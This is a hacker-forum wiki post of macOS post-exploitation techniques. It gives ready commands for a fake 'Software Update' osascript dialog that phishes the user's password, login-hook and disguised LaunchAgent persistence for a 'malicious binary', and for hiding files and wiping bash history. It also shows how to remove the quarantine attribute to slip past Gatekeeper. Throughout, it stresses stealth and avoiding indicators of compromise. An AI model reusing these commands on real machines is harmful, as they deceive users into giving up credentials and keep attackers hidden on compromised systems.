This post was created as a Wiki allowing it to be a living document updated and maintained by SubHacker.net members.
Getting User Password With OSAScript
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
button returned:OK, text returned:Subhacker R00lz
A login hook tells Mac OS X to execute a certain script when a user logs in. Unlike Startup Items that open when a user logs in, a login hook is a script that executes as root.
Just run the following command. Note that this will modify the
/var/root/Library/Preferences/com.apple.loginwindow file and is a common tactic; as such it is recommended to use the alternative login hook method to avoid possible IoCs
defaults write com.apple.loginwindow LoginHook /usr/bin/hook.sh
Alternative Login Hook via
/etc/ttys ( Mac OS X 10.2.x, 10.3.x, or 10.4.2 or later )
Requires root/wheel access but avoids a commonly used command and file so useful for being a little stealthier
Look for a line that looks like this
#console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow" vt100 on secure window=/System/Library/CoreServices/WindowServer onoption="/usr/libexec/getty std.9600"
Add your login hook right after the "loginwindow" text before the double quote. Example:
#console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow -LoginHook /path/to/script" vt100 on secure window=/System/Library/CoreServices/WindowServer onoption="/usr/libexec/getty std.9600"
Create a normal sounding filename with extension of .plist. In this example we will use the filename
com.apple.diagnosticsx.plist paste the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<string> values need to be updated. The first one should reflect your .plist filename minus the .plist extension and the second one is the location to your malicious binary to be executed.
/Users/<username>/Library/LaunchAgents/com.apple.diagnosticsx.plist and execute the following command:
/bin/launchctl load -w /Users/<username>/Library/LaunchAgents/com.apple.diagnosticsx.plist
You're good to go. Your malicious binary will now be run and the "KeepAlive" key will ensure that if it ever crashes or is terminated that launchd will automatically run it again. Note that it is good practice to ensure your payload has executable privileges (
chmod +x payload)
Avoid Spotlight Indexing
.metadata_never_index to a directory to keep that directory from being indexed
Hide Files From GUI View
chflags and set the file/directory to have a hidden attribute
$ chflags hidden FILE
Bash History Evasion
; history -d $(history 1) after your command and it will be hidden from the bash history
$ touch /tmp/toteshidden; history -d $(history 1)
$ ls /tmp/toteshidden
$ history |grep toteshidden
550 ls /tmp/toteshidden
551 history |grep toteshidden
Quarantine attribute removal
When a file is downloaded from a remote source using a quarantine-aware application, a quarantine attribute will be set on the file causing gatekeeper to display a warning and prompt the user for confirmation before launching the file.
The following command will remove this quarantine attribute:
/usr/bin/xattr -d -r com.apple.quarantine <FILE>